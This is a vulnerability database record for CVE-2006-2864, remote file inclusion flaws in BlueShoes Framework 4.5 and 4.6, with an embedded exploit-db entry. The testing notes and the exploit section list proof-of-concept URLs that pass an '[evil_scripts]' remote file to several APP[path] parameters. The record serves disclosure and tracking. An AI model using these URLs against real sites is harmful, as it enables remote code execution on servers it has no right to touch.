ID OSVDB:26002 Type osvdb Reporter Kacper(kacper1964@yahoo.pl) Modified 2006-06-03T08:35:31
Description
Vulnerability Description
BlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
Technical Description
This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.
Solution Description
Currently, there are no known upgrades, patches, or workarounds available to correct this issue.
Short Description
BlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
{"type": "osvdb", "published": "2006-06-03T08:35:31", "href": "https://vulners.com/osvdb/OSVDB:26002", "hashmap": [{"key": "affectedSoftware", "hash": "cfe9c26c7c18e1791fc116c26a009a64"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "c7f9ee4fe7e265334c36bcb06aecea29"}, {"key": "cvss", "hash": "88e04999358e76acae57a21bcf224d40"}, {"key": "description", "hash": "19b22617e37a03790f3d8d22aaf8feff"}, {"key": "href", "hash": "7b35e995f106addfd7df62ee8b0fed10"}, {"key": "modified", "hash": "bb4eda7850d6f8ecbc2d340f58b95ca3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "bb4eda7850d6f8ecbc2d340f58b95ca3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "37f47c5035a3a7799ce4f3bc60e83b75"}, {"key": "title", "hash": "4b3b649a6a5f58b358b43ceb71d1fa32"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "bulletinFamily": "software", "cvss": {"vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 5.1}, "viewCount": 0, "history": [], "edition": 1, "objectVersion": "1.2", "reporter": "Kacper(kacper1964@yahoo.pl)", "title": "BlueShoes Framework websearchengine/Bs_Wse_Profile.class.php APP[path][plugins] Variable Remote File Inclusion", "affectedSoftware": [{"operator": "eq", "version": "4.6", "name": "BlueShoes Framework"}, {"operator": "eq", "version": "4.5", "name": "BlueShoes Framework"}], "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "vulnersScore": 7.5}, "references": [], "id": "OSVDB:26002", "hash": "0b71380406c8fa4e8ab50cced6b66bcb38e13bbeb923e2a0b39fbb9d7777a77a", "lastseen": "2017-04-28T13:20:22", "cvelist": ["CVE-2006-2864"], "modified": "2006-06-03T08:35:31", "description": "## Vulnerability Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to websearchengine/Bs_Wse_Profile.class.php not properly sanitizing user input supplied to the 'APP[path][plugins]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]\n## References:\nVendor URL: http://www.blueshoes.org/\n[Secunia Advisory ID:20438](https://secuniaresearch.flexerasoftware.com/advisories/20438/)\n[Related OSVDB ID: 25999](https://vulners.com/osvdb/OSVDB:25999)\n[Related OSVDB ID: 26000](https://vulners.com/osvdb/OSVDB:26000)\n[Related OSVDB ID: 25998](https://vulners.com/osvdb/OSVDB:25998)\n[Related OSVDB ID: 25996](https://vulners.com/osvdb/OSVDB:25996)\n[Related OSVDB ID: 26001](https://vulners.com/osvdb/OSVDB:26001)\n[Related OSVDB ID: 25997](https://vulners.com/osvdb/OSVDB:25997)\nISS X-Force ID: 26908\nGeneric Exploit URL: http://milw0rm.com/exploits/1870\nFrSIRT Advisory: ADV-2006-2128\n[CVE-2006-2864](https://vulners.com/cve/CVE-2006-2864)\nBugtraq ID: 18261\n"}
{"cve": [{"lastseen": "2017-10-19T11:12:24", "references": ["http://www.blueshoes.org/en/news/", "https://exchange.xforce.ibmcloud.com/vulnerabilities/26908", "http://www.vupen.com/english/advisories/2006/2128", "http://www.securityfocus.com/bid/18261", "https://www.exploit-db.com/exploits/1870"], "description": "Multiple PHP remote file inclusion vulnerabilities in BlueShoes Framework 4.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1) APP[path][applications] parameter to (a) Bs_Faq.class.php, (2) APP[path][core] parameter to (b) fileBrowserInner.php, (c) file.php, and (d) viewer.php, and (e) Bs_ImageArchive.class.php, (3) GLOBALS[APP][path][core] parameter to (f) Bs_Ml_User.class.php, or (4) APP[path][plugins] parameter to (g) Bs_Wse_Profile.class.php.", "edition": 3, "reporter": "NVD", "published": "2006-06-06T16:06:00", "title": "CVE-2006-2864", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:12:24", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-2864"], "scanner": [], "modified": "2017-10-18T21:29:10", "cpe": ["cpe:/a:blueshoes:blueshoes_framework:4.5", "cpe:/a:blueshoes:blueshoes_framework:4.6"], "id": "CVE-2006-2864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2864", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "references": [], "edition": 1, "description": "## Vulnerability Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to mailinglist/Bs_Ml_User.class.php not properly sanitizing user input supplied to the 'GLOBALS[APP][path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Additionally, the framework must be installed under the web root directory.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nBlueShoes Framework contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to mailinglist/Bs_Ml_User.class.php not properly sanitizing user input supplied to the 'GLOBALS[APP][path][core]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]\n## References:\nVendor URL: http://www.blueshoes.org/\n[Secunia Advisory ID:20438](https://secuniaresearch.flexerasoftware.com/advisories/20438/)\n[Related OSVDB ID: 25999](https://vulners.com/osvdb/OSVDB:25999)\n[Related OSVDB ID: 26000](https://vulners.com/osvdb/OSVDB:26000)\n[Related OSVDB ID: 25998](https://vulners.com/osvdb/OSVDB:25998)\n[Related OSVDB ID: 25996](https://vulners.com/osvdb/OSVDB:25996)\n[Related OSVDB ID: 25997](https://vulners.com/osvdb/OSVDB:25997)\n[Related OSVDB ID: 26002](https://vulners.com/osvdb/OSVDB:26002)\nISS X-Force ID: 26908\nGeneric Exploit URL: http://milw0rm.com/exploits/1870\nFrSIRT Advisory: ADV-2006-2128\n[CVE-2006-2864](https://vulners.com/cve/CVE-2006-2864)\nBugtraq ID: 18261\n", "reporter": "Kacper(kacper1964@yahoo.pl)", "published": "2006-06-03T08:35:31", "type": "osvdb", "title": "BlueShoes Framework mailinglist/Bs_Ml_User.class.php GLOBALS[APP][path][core] Variable Remote File Inclusion", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "BlueShoes Framework", "version": "4.6", "operator": "eq"}, {"name": "BlueShoes Framework", "version": "4.5", "operator": "eq"}], "cvelist": ["CVE-2006-2864"], "modified": "2006-06-03T08:35:31", "href": "https://vulners.com/osvdb/OSVDB:26001", "id": "OSVDB:26001", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:02:54", "osvdbidlist": ["25997", "25998", "26000", "26001", "25996", "25999", "26002"], "references": [], "description": "BlueShoes Framework <= 4.6 Remote File Include Vulnerabilities. CVE-2006-2864. Webapps exploit for php platform", "edition": 1, "reporter": "Kacper", "published": "2006-06-03T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "exploitdb", "title": "BlueShoes Framework <= 4.6 - Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-2864"], "modified": "2006-06-03T00:00:00", "id": "EDB-ID:1870", "href": "https://www.exploit-db.com/exploits/1870/", "sourceData": "$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$\n$$\n$$ BlueShoes Framework 4.6 <= Remote File Include Vulnerability\n$$ Script site: http://www.blueshoes.org/\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Find by: Kacper (a.k.a Rahim)\n$$\n$$ Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n$$\n$$ Greetz: DragonHeart, Satan, Leito, Leon, Luzak,\n$$ Adam, DeathSpeed, Drzewko, pepi\n$$\n$$ Specjal greetz: DragonHeart ;-)\n$$\n$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nExpl:\n\nhttp://www.site.com/[BlueShoes_path]/applications/faq/Bs_Faq.class.php?APP[path][applications]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/filebrowser/fileBrowserInner.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/filemanager/file.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/filemanager/viewer.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/imagearchive/Bs_ImageArchive.class.php?APP[path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/mailinglist/Bs_Ml_User.class.php?GLOBALS[APP][path][core]=[evil_scripts]\n\nhttp://www.site.com/[BlueShoes_path]/applications/websearchengine/Bs_Wse_Profile.class.php?APP[path][plugins]=[evil_scripts]\n\n#Pozdro dla wszystkich ;-)\n\n# milw0rm.com [2006-06-03]\n", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1870/"}]}
